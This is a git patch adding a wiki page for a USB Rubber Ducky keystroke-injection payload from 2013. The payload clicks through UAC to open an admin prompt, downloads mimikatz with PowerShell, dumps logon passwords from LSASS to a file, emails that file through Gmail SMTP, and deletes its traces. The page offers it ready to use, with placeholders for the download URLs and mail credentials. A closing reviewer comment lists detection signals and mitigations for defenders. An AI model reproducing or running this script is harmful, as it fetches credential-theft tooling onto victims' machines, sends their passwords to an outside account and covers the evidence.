From 1eb3cf53c1dcd5031849588a7716f5395056435f Mon Sep 17 00:00:00 2001
From: pesce
Date: Sun, 20 Oct 2013 21:26:14 -0700
Subject: [PATCH] Created Payload download mimikatz, grab passwords and email them via gmail (markdown)
---
 ...grab-passwords-and-email-them-via-gmail.md | 87 +++++++++++++++++++
 1 file changed, 87 insertions(+)
 create mode 100644 Payload---download-mimikatz,-grab-passwords-and-email-them-via-gmail.md
diff --git a/Payload---download-mimikatz,-grab-passwords-and-email-them-via-gmail.md b/Payload---download-mimikatz,-grab-passwords-and-email-them-via-gmail.md
new file mode 100644
index 0000000..a85324b
--- /dev/null
+++ b/Payload---download-mimikatz,-grab-passwords-and-email-them-via-gmail.md
@@ -0,0 +1,87 @@
+This payload:
+1. Downloads appropriate mimikatz version via http (I used dropbox)
+2. Opens a admin prompt
+3. saves mimikatz log to file
+4. emails log via gmail
+
+
+please change these lines to something (keep the single quote):
+'url to 32bit mimikatz.exe'
+'url to 64bit mimikatz.exe'
+'gmailuser', 'gmail password'
+
+
+Sorry about the wacky delays!
+
+
+```
+REM Author: Pesce
+REM Date: 10/20/2013
+REM Note: Thanks to all the help everyone! This is my first attempt, don't be to upset!
+REM -------------open command prompt with admin privileges
+DELAY 3000
+CONTROL ESCAPE
+DELAY 1000
+STRING cmd
+DELAY 1000
+CTRL-SHIFT ENTER
+DELAY 1000
+ALT y
+ENTER
+DELAY 300
+REM -------------download appropriate mimikatz for architecture
+STRING powershell if ([System.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('http://url to 32bit mimikatz.exe','%TEMP%\pw.exe'); }else{ (new-object System.Net.WebClient).DownloadFile('http://url to 64bit mimikatz.exe','%TEMP%\pw.exe');}
+ENTER
+DELAY 5000
+REM -------------get the passwords and save to c:\pwlog.txt
+STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
+ENTER
+DELAY 2000
+STRING privilege::debug
+ENTER
+DELAY 1000
+STRING sekurlsa::logonPasswords full
+ENTER
+DELAY 1000
+STRING exit
+ENTER
+DELAY 300
+STRING del %TEMP%\pw.exe
+ENTER
+DELAY 300
+REM -------------email log via gmail
+STRING powershell
+ENTER
+DELAY 300
+STRING $SMTPServer = 'smtp.gmail.com'
+ENTER
+STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
+ENTER
+STRING $SMTPInfo.EnableSsl = $true
+ENTER
+STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('gmailuser', 'gmail password');
+ENTER
+STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
+ENTER
+STRING $ReportEmail.From = 'pesce@pescetech.com'
+ENTER
+STRING $ReportEmail.To.Add('pesce@pescetech.com')
+ENTER
+STRING $ReportEmail.Subject = 'Duck Report'
+ENTER
+STRING $ReportEmail.Body = 'Attached is your duck report.'
+ENTER
+STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
+ENTER
+STRING $SMTPInfo.Send($ReportEmail)
+ENTER
+DELAY 1000
+STRING exit
+ENTER
+REM ---------------------delete and end
+STRING del c:\pwlog.txt
+ENTER
+DELAY 300
+STRING exit
+ENTER
+```
\ No newline at end of file
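Review bot: The page ends at the closing fence with no detection or hardening notes, so a defender reading it has to work out the observable footprint from the keystrokes alone. Each step in the fenced script leaves something to look for: an elevated `cmd` started through a UAC consent prompt (`ALT y`), a `System.Net.WebClient` download of an executable into `%TEMP%`, `privilege::debug` and `sekurlsa::logonPasswords` reading LSASS, a cleartext dump at `c:\pwlog.txt`, and an authenticated SMTP session to `smtp.gmail.com` on port 587. I would add a closing section after the fence along the lines of `Detection and mitigation: process-creation auditing and PowerShell script-block logging record the spawned processes and the PowerShell commands; LSA protection or Credential Guard, standard-user accounts (no UAC consent click-through), and blocking outbound SMTP from workstations each break one step.` Which of those controls apply depends on the Windows version in use, which the page does not state.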